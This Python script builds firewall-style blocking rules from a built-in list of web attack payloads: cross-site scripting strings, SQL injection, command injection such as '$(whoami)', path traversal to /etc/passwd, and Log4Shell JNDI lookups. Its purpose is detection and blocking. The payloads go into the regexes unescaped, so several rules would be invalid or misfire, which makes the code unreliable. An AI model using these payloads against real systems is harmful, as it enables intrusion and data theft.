import json
import logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
def generate_vulnerability_rules(output_path):
"""Generates rules from a predefined list of vulnerability payloads."""
all_rules = []
payloads = {
"xss": {
"patterns": [
"",
"
",
"javascript:alert(1)",
"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" #base64 encoded script tag
],
"targets": ["ARGS", "BODY", "HEADERS"]
},
"sqli": {
"patterns": [
"1' OR '1'='1",
"'; SELECT * FROM users;",
"\" OR \"1\"=\"1",
"UNION SELECT 1,2,3;"
],
"targets": ["ARGS", "BODY", "HEADERS"]
},
"rce": {
"patterns": [
"`whoami`",
"$(whoami)",
"; ls -la;",
"| id"
],
"targets": ["ARGS", "HEADERS"]
},
"lfi":{
"patterns":[
"../etc/passwd",
"../../../../etc/passwd"
],
"targets":["URI"]
},
"log4j": {
"patterns": [
"${jndi:ldap://example.com/a}",
"${jndi:rmi://example.com/b}",
"${jndi:dns://example.com/c}"
],
"targets": ["ARGS", "BODY", "HEADERS"]
},
}
rule_counter = 0
for vuln_type, data in payloads.items():
for pattern in data["patterns"]:
rule = {
"id": f"{vuln_type}-{rule_counter}",
"phase": 2,
"pattern": f"(?i){pattern}",
"targets": data["targets"],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": f"Detects {vuln_type} attack payload: {pattern}"
}
all_rules.append(rule)
rule_counter += 1
logging.info(f"Generated {len(all_rules)} rules from vulnerability payloads.")
with open(output_path, 'w') as f:
json.dump(all_rules, f, indent=2)
logging.info(f"Saved {len(all_rules)} rules to {output_path}")
if __name__ == "__main__":
output_path = "vulnerability_rules.json"
generate_vulnerability_rules(output_path)